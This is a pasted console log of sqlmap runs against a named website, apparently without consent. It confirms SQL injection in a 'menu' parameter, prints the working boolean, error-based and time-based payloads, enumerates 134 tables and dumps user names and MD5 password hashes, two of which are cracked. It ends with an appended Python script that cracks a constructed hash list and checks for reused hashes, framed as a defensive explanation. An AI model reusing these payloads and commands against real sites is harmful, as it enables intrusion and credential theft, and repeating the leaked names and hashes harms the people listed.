Netikerty

Another scan with Sqlmap

Feb 23rd, 2013
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent --dbs

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet --tables

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:14:54

[22:14:54] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.52 (X11; Linux x86_64; U; en)
[22:14:55] [INFO] resuming back-end DBMS 'mysql'
[22:15:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: menu
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
---

[22:15:10] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0
[22:15:10] [INFO] fetching tables for database: 'gymsticknet'
[22:15:23] [INFO] heuristics detected web page charset 'ascii'
[22:15:23] [INFO] the SQL query used returns 134 entries
[22:15:24] [INFO] retrieved: afb_accounts
[22:15:24] [INFO] retrieved: afb_accounts_has_perms
[22:15:25] [INFO] retrieved: afb_blacklist_dirs
[22:15:25] [INFO] retrieved: afb_blacklist_ext
[22:15:26] [INFO] retrieved: afb_blacklist_files
[22:15:26] [INFO] retrieved: afb_log
[22:15:27] [INFO] retrieved: afb_settings
[22:15:28] [INFO] retrieved: afb_shares
[22:15:28] [INFO] retrieved: bh2_aclgroups
[22:15:30] [INFO] retrieved: bh2_aclpublic
[22:15:31] [INFO] retrieved: bh2_aclusers
[22:15:31] [INFO] retrieved: bh2_adminmodulesmenu
[22:15:32] [INFO] retrieved: bh2_bandwidth
[22:15:32] [INFO] retrieved: bh2_config
[22:15:34] [INFO] retrieved: bh2_filecodereminders
[22:15:34] [INFO] retrieved: bh2_filecodes
[22:15:35] [INFO] retrieved: bh2_groupusers
[22:15:36] [INFO] retrieved: bh2_log
[22:15:36] [INFO] retrieved: bh2_logactions
[22:15:37] [INFO] retrieved: bh2_metadata
[22:15:39] [INFO] retrieved: bh2_modules
[22:15:39] [INFO] retrieved: bh2_modulesaccesslevel
[22:15:40] [INFO] retrieved: bh2_modulesdirectory
[22:15:40] [INFO] retrieved: bh2_modulesfiletype
[22:15:41] [INFO] retrieved: bh2_modulesmenu
[22:15:42] [INFO] retrieved: bh2_modulesusertype
[22:15:43] [INFO] retrieved: bh2_packages
[22:15:43] [INFO] retrieved: bh2_passwordresets
[22:15:45] [INFO] retrieved: bh2_registrations
[22:15:46] [INFO] retrieved: bh2_satellitetransfers
[22:15:46] [INFO] retrieved: bh2_texts
[22:15:47] [INFO] retrieved: bh2_uploads
[22:15:48] [INFO] retrieved: bh2_userinfo
[22:15:50] [INFO] retrieved: bh2_users
[22:15:51] [INFO] retrieved: bh2_usersviews
[22:15:53] [INFO] retrieved: contacts
[22:15:55] [INFO] retrieved: countries
[22:15:57] [INFO] retrieved: downloads_agreements
[22:15:59] [INFO] retrieved: downloads_categories
[22:16:00] [INFO] retrieved: downloads_comments
[22:16:02] [INFO] retrieved: downloads_config
[22:16:04] [INFO] retrieved: downloads_customfields
[22:16:06] [INFO] retrieved: downloads_customfields_data
[22:16:07] [INFO] retrieved: downloads_files
[22:16:09] [INFO] retrieved: downloads_ip_restrict
[22:16:10] [INFO] retrieved: downloads_ip_restrict_log
[22:16:10] [INFO] retrieved: downloads_languages
[22:16:11] [INFO] retrieved: downloads_leech_settings
[22:16:12] [INFO] retrieved: downloads_mirrors
[22:16:12] [INFO] retrieved: downloads_permissions
[22:16:13] [INFO] retrieved: downloads_recommend_blocklist
[22:16:13] [INFO] retrieved: downloads_recommend_log
[22:16:14] [INFO] retrieved: downloads_stats
[22:16:14] [INFO] retrieved: downloads_usergroups
[22:16:15] [INFO] retrieved: downloads_userpermissions
[22:16:16] [INFO] retrieved: downloads_users
[22:16:16] [INFO] retrieved: files
[22:16:17] [INFO] retrieved: folders
[22:16:17] [INFO] retrieved: intrausers
[22:16:18] [INFO] retrieved: ipfm_groups
[22:16:19] [INFO] retrieved: ipfm_reg_antispam
[22:16:19] [INFO] retrieved: ipfm_validating
[22:16:20] [INFO] retrieved: menu
[22:16:21] [INFO] retrieved: pages
[22:16:21] [INFO] retrieved: pfn_accesos
[22:16:22] [INFO] retrieved: pfn_arquivos
[22:16:22] [INFO] retrieved: pfn_arquivos_campos_palabras
[22:16:23] [INFO] retrieved: pfn_bloqueo_ip
[22:16:23] [INFO] retrieved: pfn_campos
[22:16:24] [INFO] retrieved: pfn_configuracions
[22:16:25] [INFO] retrieved: pfn_configuracions_datos
[22:16:25] [INFO] retrieved: pfn_directorios
[22:16:26] [INFO] retrieved: pfn_grupos
[22:16:26] [INFO] retrieved: pfn_palabras
[22:16:27] [INFO] retrieved: pfn_raices
[22:16:27] [INFO] retrieved: pfn_raices_grupos_configuracions
[22:16:28] [INFO] retrieved: pfn_raices_usuarios
[22:16:29] [INFO] retrieved: pfn_sesions
[22:16:29] [INFO] retrieved: pfn_usuarios
[22:16:30] [INFO] retrieved: phpwebgallery_caddie
[22:16:31] [INFO] retrieved: phpwebgallery_categories
[22:16:31] [INFO] retrieved: phpwebgallery_comments
[22:16:32] [INFO] retrieved: phpwebgallery_config
[22:16:32] [INFO] retrieved: phpwebgallery_download_multi
[22:16:33] [INFO] retrieved: phpwebgallery_favorites
[22:16:34] [INFO] retrieved: phpwebgallery_group_access
[22:16:36] [INFO] retrieved: phpwebgallery_groups
[22:16:36] [INFO] retrieved: phpwebgallery_history
[22:16:37] [INFO] retrieved: phpwebgallery_history_summary
[22:16:38] [INFO] retrieved: phpwebgallery_image_category
[22:16:38] [INFO] retrieved: phpwebgallery_image_tag
[22:16:39] [INFO] retrieved: phpwebgallery_images
[22:16:39] [INFO] retrieved: phpwebgallery_old_permalinks
[22:16:40] [INFO] retrieved: phpwebgallery_plugins
[22:16:41] [INFO] retrieved: phpwebgallery_rate
[22:16:41] [INFO] retrieved: phpwebgallery_search
[22:16:42] [INFO] retrieved: phpwebgallery_sessions
[22:16:42] [INFO] retrieved: phpwebgallery_sites
[22:16:43] [INFO] retrieved: phpwebgallery_tags
[22:16:43] [INFO] retrieved: phpwebgallery_upgrade
[22:16:44] [INFO] retrieved: phpwebgallery_user_access
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache_categories
[22:16:46] [INFO] retrieved: phpwebgallery_user_feed
[22:16:47] [INFO] retrieved: phpwebgallery_user_group
[22:16:47] [INFO] retrieved: phpwebgallery_user_infos
[22:16:48] [INFO] retrieved: phpwebgallery_user_mail_notification
[22:16:48] [INFO] retrieved: phpwebgallery_users
[22:16:49] [INFO] retrieved: phpwebgallery_waiting
[22:16:53] [INFO] retrieved: phpwebgallery_ws_access
[22:16:54] [INFO] retrieved: relay_clients
[22:16:54] [INFO] retrieved: relay_filesystem
[22:16:55] [INFO] retrieved: relay_log
[22:16:56] [INFO] retrieved: relay_permissions
[22:16:57] [INFO] retrieved: relay_users
[22:16:58] [INFO] retrieved: spages
[22:16:58] [INFO] retrieved: submenu
[22:16:59] [INFO] retrieved: tc_acp_label_states
[22:17:00] [INFO] retrieved: tc_admin_cp_false_logins
[22:17:01] [INFO] retrieved: tc_banned_ips
[22:17:01] [INFO] retrieved: tc_error_log
[22:17:02] [INFO] retrieved: tc_forum_integration
[22:17:03] [INFO] retrieved: tc_installed_plugins
[22:17:03] [INFO] retrieved: tc_membergroups
[22:17:04] [INFO] retrieved: tc_members
[22:17:05] [INFO] retrieved: tc_menu
[22:17:05] [INFO] retrieved: tc_pages
[22:17:06] [INFO] retrieved: tc_plugin_lists
[22:17:06] [INFO] retrieved: tc_plugins
[22:17:07] [INFO] retrieved: tc_sessions
[22:17:07] [INFO] retrieved: tc_settings
[22:17:08] [INFO] retrieved: tc_statistics_visitors
[22:17:09] [INFO] retrieved: test
[22:17:09] [INFO] retrieved: users
Database: gymsticknet
[134 tables]
+--------------------------------------+
| afb_accounts                         |
| afb_accounts_has_perms               |
| afb_blacklist_dirs                   |
| afb_blacklist_ext                    |
| afb_blacklist_files                  |
| afb_log                              |
| afb_settings                         |
| afb_shares                           |
| bh2_aclgroups                        |
| bh2_aclpublic                        |
| bh2_aclusers                         |
| bh2_adminmodulesmenu                 |
| bh2_bandwidth                        |
| bh2_config                           |
| bh2_filecodereminders                |
| bh2_filecodes                        |
| bh2_groupusers                       |
| bh2_log                              |
| bh2_logactions                       |
| bh2_metadata                         |
| bh2_modules                          |
| bh2_modulesaccesslevel               |
| bh2_modulesdirectory                 |
| bh2_modulesfiletype                  |
| bh2_modulesmenu                      |
| bh2_modulesusertype                  |
| bh2_packages                         |
| bh2_passwordresets                   |
| bh2_registrations                    |
| bh2_satellitetransfers               |
| bh2_texts                            |
| bh2_uploads                          |
| bh2_userinfo                         |
| bh2_users                            |
| bh2_usersviews                       |
| contacts                             |
| countries                            |
| downloads_agreements                 |
| downloads_categories                 |
| downloads_comments                   |
| downloads_config                     |
| downloads_customfields               |
| downloads_customfields_data          |
| downloads_files                      |
| downloads_ip_restrict                |
| downloads_ip_restrict_log            |
| downloads_languages                  |
| downloads_leech_settings             |
| downloads_mirrors                    |
| downloads_permissions                |
| downloads_recommend_blocklist        |
| downloads_recommend_log              |
| downloads_stats                      |
| downloads_usergroups                 |
| downloads_userpermissions            |
| downloads_users                      |
| files                                |
| folders                              |
| intrausers                           |
| ipfm_groups                          |
| ipfm_reg_antispam                    |
| ipfm_validating                      |
| menu                                 |
| pages                                |
| pfn_accesos                          |
| pfn_arquivos                         |
| pfn_arquivos_campos_palabras         |
| pfn_bloqueo_ip                       |
| pfn_campos                           |
| pfn_configuracions                   |
| pfn_configuracions_datos             |
| pfn_directorios                      |
| pfn_grupos                           |
| pfn_palabras                         |
| pfn_raices                           |
| pfn_raices_grupos_configuracions     |
| pfn_raices_usuarios                  |
| pfn_sesions                          |
| pfn_usuarios                         |
| phpwebgallery_caddie                 |
| phpwebgallery_categories             |
| phpwebgallery_comments               |
| phpwebgallery_config                 |
| phpwebgallery_download_multi         |
| phpwebgallery_favorites              |
| phpwebgallery_group_access           |
| phpwebgallery_groups                 |
| phpwebgallery_history                |
| phpwebgallery_history_summary        |
| phpwebgallery_image_category         |
| phpwebgallery_image_tag              |
| phpwebgallery_images                 |
| phpwebgallery_old_permalinks         |
| phpwebgallery_plugins                |
| phpwebgallery_rate                   |
| phpwebgallery_search                 |
| phpwebgallery_sessions               |
| phpwebgallery_sites                  |
| phpwebgallery_tags                   |
| phpwebgallery_upgrade                |
| phpwebgallery_user_access            |
| phpwebgallery_user_cache             |
| phpwebgallery_user_cache_categories  |
| phpwebgallery_user_feed              |
| phpwebgallery_user_group             |
| phpwebgallery_user_infos             |
| phpwebgallery_user_mail_notification |
| phpwebgallery_users                  |
| phpwebgallery_waiting                |
| phpwebgallery_ws_access              |
| relay_clients                        |
| relay_filesystem                     |
| relay_log                            |
| relay_permissions                    |
| relay_users                          |
| spages                               |
| submenu                              |
| tc_acp_label_states                  |
| tc_admin_cp_false_logins             |
| tc_banned_ips                        |
| tc_error_log                         |
| tc_forum_integration                 |
| tc_installed_plugins                 |
| tc_membergroups                      |
| tc_members                           |
| tc_menu                              |
| tc_pages                             |
| tc_plugin_lists                      |
| tc_plugins                           |
| tc_sessions                          |
| tc_settings                          |
| tc_statistics_visitors               |
| test                                 |
| users                                |
+--------------------------------------+

[22:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

[*] shutting down at 22:17:10

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users --columns

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:21:35

[22:21:35] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52
[22:21:36] [INFO] resuming back-end DBMS 'mysql'
[22:21:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: menu
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
---

[22:21:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0
[22:21:38] [INFO] fetching columns for table 'users' in database 'gymsticknet'
[22:21:39] [INFO] heuristics detected web page charset 'ascii'
[22:21:39] [INFO] the SQL query used returns 5 entries
[22:21:40] [INFO] retrieved: id
[22:21:40] [INFO] retrieved: int(11)
[22:21:41] [INFO] retrieved: name
[22:21:42] [INFO] retrieved: varchar(255)
[22:21:42] [INFO] retrieved: username
[22:21:43] [INFO] retrieved: varchar(255)
[22:21:43] [INFO] retrieved: password
[22:21:44] [INFO] retrieved: varchar(255)
[22:21:44] [INFO] retrieved: super
[22:21:45] [INFO] retrieved: tinyint(1)
Database: gymsticknet
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| name     | varchar(255) |
| password | varchar(255) |
| super    | tinyint(1)   |
| username | varchar(255) |
+----------+--------------+

[22:21:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

[*] shutting down at 22:21:45

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C name --dump

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:24:37

[22:24:37] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
[22:24:38] [INFO] resuming back-end DBMS 'mysql'
[22:24:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: menu
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
---

[22:24:43] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 2

[22:24:47] [INFO] fetching columns 'name' for table 'users' in database 'gymsticknet'
[22:24:47] [INFO] heuristics detected web page charset 'ascii'
[22:24:48] [INFO] the SQL query used returns 1 entries
[22:24:48] [INFO] retrieved: name
[22:24:49] [INFO] retrieved: varchar(255)
[22:24:49] [INFO] fetching entries of column(s) 'name' for table 'users' in database 'gymsticknet'
[22:24:49] [INFO] the SQL query used returns 4 entries
[22:24:50] [INFO] retrieved: antti mikkola
[22:24:51] [INFO] retrieved: juha hoo
[22:24:51] [INFO] retrieved: keijo pesonen
[22:24:52] [INFO] retrieved: testikayttaja
[22:24:52] [INFO] analyzing table dump for possible password hashes
Database: gymsticknet
Table: users
[4 entries]
+---------------+
| name          |
+---------------+
| antti mikkola |
| juha hoo      |
| keijo pesonen |
| testikayttaja |
+---------------+

[22:24:52] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
[22:24:52] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

[*] shutting down at 22:24:52

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C password --dump

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:25:42

[22:25:42] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[22:25:42] [INFO] resuming back-end DBMS 'mysql'
[22:25:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: menu
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
---

[22:25:45] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 2

[22:25:49] [INFO] fetching columns 'password' for table 'users' in database 'gymsticknet'
[22:25:50] [INFO] heuristics detected web page charset 'ascii'
[22:25:50] [INFO] the SQL query used returns 1 entries
[22:25:51] [INFO] retrieved: password
[22:25:51] [INFO] retrieved: varchar(255)
[22:25:52] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'gymsticknet'
[22:25:52] [INFO] the SQL query used returns 4 entries
[22:25:52] [INFO] retrieved: 8d68c0d987f302d0fe6de347245b5587
[22:25:53] [INFO] retrieved: 9627df7a4a5b849f67fce863e82adc71
[22:25:53] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
[22:25:54] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
[22:25:54] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y

[22:26:03] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1

[22:26:23] [INFO] using default dictionary
[22:26:23] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y

[22:26:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:26:32] [INFO] starting 2 processes
[22:27:08] [INFO] cracked password 'testi' for hash '9627df7a4a5b849f67fce863e82adc71'
[22:27:11] [INFO] using suffix '1'
[22:27:40] [INFO] cracked password 'molo1' for hash 'db2fa9922825f59757dd5fcb5d8e1f2b'
[22:27:54] [INFO] using suffix '123'
[22:28:35] [INFO] using suffix '2'
[22:29:17] [INFO] using suffix '12'
[22:29:55] [INFO] using suffix '3'
[22:30:34] [INFO] using suffix '13'
[22:31:12] [INFO] using suffix '7'
[22:31:57] [INFO] using suffix '11'
[22:32:34] [INFO] using suffix '5'
[22:33:23] [INFO] using suffix '22'
[22:34:00] [INFO] using suffix '23'
[22:34:41] [INFO] using suffix '01'
[22:35:36] [INFO] using suffix '4'
[22:36:28] [INFO] using suffix '07'
[22:37:06] [INFO] using suffix '21'
[22:37:44] [INFO] using suffix '14'
[22:38:27] [INFO] using suffix '10'
[22:39:07] [INFO] using suffix '06'
[22:39:42] [INFO] using suffix '08'
[22:40:20] [INFO] using suffix '8'
[22:40:58] [INFO] using suffix '15'
[22:41:38] [INFO] using suffix '69'
[22:42:17] [INFO] using suffix '16'
[22:42:52] [INFO] using suffix '6'
[22:43:27] [INFO] using suffix '18'
[22:44:06] [INFO] using suffix '!'
[22:44:44] [INFO] using suffix '.'
[22:45:21] [INFO] using suffix '*'
[22:45:58] [INFO] using suffix '!!'
[22:46:32] [INFO] using suffix '?'
[22:47:13] [INFO] using suffix ';'
[22:47:49] [INFO] using suffix '..'
[22:48:32] [INFO] using suffix '!!!'
[22:49:17] [INFO] using suffix ','
[22:49:54] [INFO] using suffix '@'
[22:50:33] [INFO] writing uncracked hashes to file '/tmp/tmpzshPZE.txt' for eventual further processing
[22:50:33] [INFO] postprocessing table dump
Database: gymsticknet
Table: users
[4 entries]
+------------------------------------------+
| password                                 |
+------------------------------------------+
| 8d68c0d987f302d0fe6de347245b5587         |
| 9627df7a4a5b849f67fce863e82adc71 (testi) |
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
+------------------------------------------+

[22:50:33] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
[22:50:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

[*] shutting down at 22:50:33
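What the dictionary pass above is doing with its "common password suffixes", plus the check worth running on any dumped password column before cracking anything, as an added example that is not part of the paste and not sqlmap's code. The wordlist and suffix list are constructed (the suffixes are a subset of the ones the log iterates); the sample "dump" is generated here from plaintexts rather than copied from the paste: 'testi' and 'molo1' are the values the log reports cracked, and the first entry uses an invented passphrase so the uncracked path is exercised. Function names are mine.

```python
import hashlib
from collections import Counter


def md5_hex(text: str) -> str:
    """Unsalted MD5 in hex, the scheme the 32-character hashes above imply
    (sqlmap called it 'md5_generic_passwd')."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# Constructed dump with the same shape as the 'password' column above:
# one entry that stays uncracked (invented passphrase) and three weak ones,
# two of them identical.
DUMPED = [
    md5_hex("purple-tractor-harbour-44"),   # stands in for the uncracked row
    md5_hex("testi"),
    md5_hex("molo1"),
    md5_hex("molo1"),
]

# Constructed wordlist; sqlmap used its txt/wordlist.txt instead.
WORDLIST = ["admin", "password", "testi", "gymstick", "salasana", "molo"]
# Subset of the suffix list the log shows ('1', '123', '2', '12', ...).
SUFFIXES = ["", "1", "123", "2", "12", "3", "!", "."]


def crack(hashes, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Return {hash: plaintext} for every dumped hash hit by word+suffix.
    Each candidate is hashed once and looked up in a set, so the cost is
    O(len(wordlist) * len(suffixes)) however many hashes were dumped. That
    property, not MD5's speed alone, is what makes unsalted hashes cheap
    to attack in bulk."""
    targets = set(hashes)
    found = {}
    for suffix in suffixes:          # bare words first, then each suffix, as in the log
        for word in wordlist:
            candidate = word + suffix
            digest = md5_hex(candidate)
            if digest in targets and digest not in found:
                found[digest] = candidate
        if len(found) == len(targets):
            break
    return found


def shared_passwords(hashes):
    """Hashes that occur more than once. With a per-user salt two users with
    the same password get different hashes, so duplicates prove both
    unsalted storage and password reuse, with zero cracking effort."""
    return {h: n for h, n in Counter(hashes).items() if n > 1}


def annotate(hashes, cracked):
    """Render rows the way sqlmap prints them: 'hash (plaintext)' when cracked."""
    return [f"{h} ({cracked[h]})" if h in cracked else h for h in hashes]


if __name__ == "__main__":
    cracked = crack(DUMPED)
    for row in annotate(DUMPED, cracked):
        print(row)
    print("reused:", shared_passwords(DUMPED))
```

Before any cracking, shared_passwords() already tells the reviewer what the final table above shows twice over: two rows carry the identical hash db2fa9922825f59757dd5fcb5d8e1f2b, so two accounts share a password and the application stores unsalted MD5. A salted, deliberately slow scheme (bcrypt, scrypt, Argon2) removes both findings: the duplicate check stops working and every candidate has to be recomputed per user.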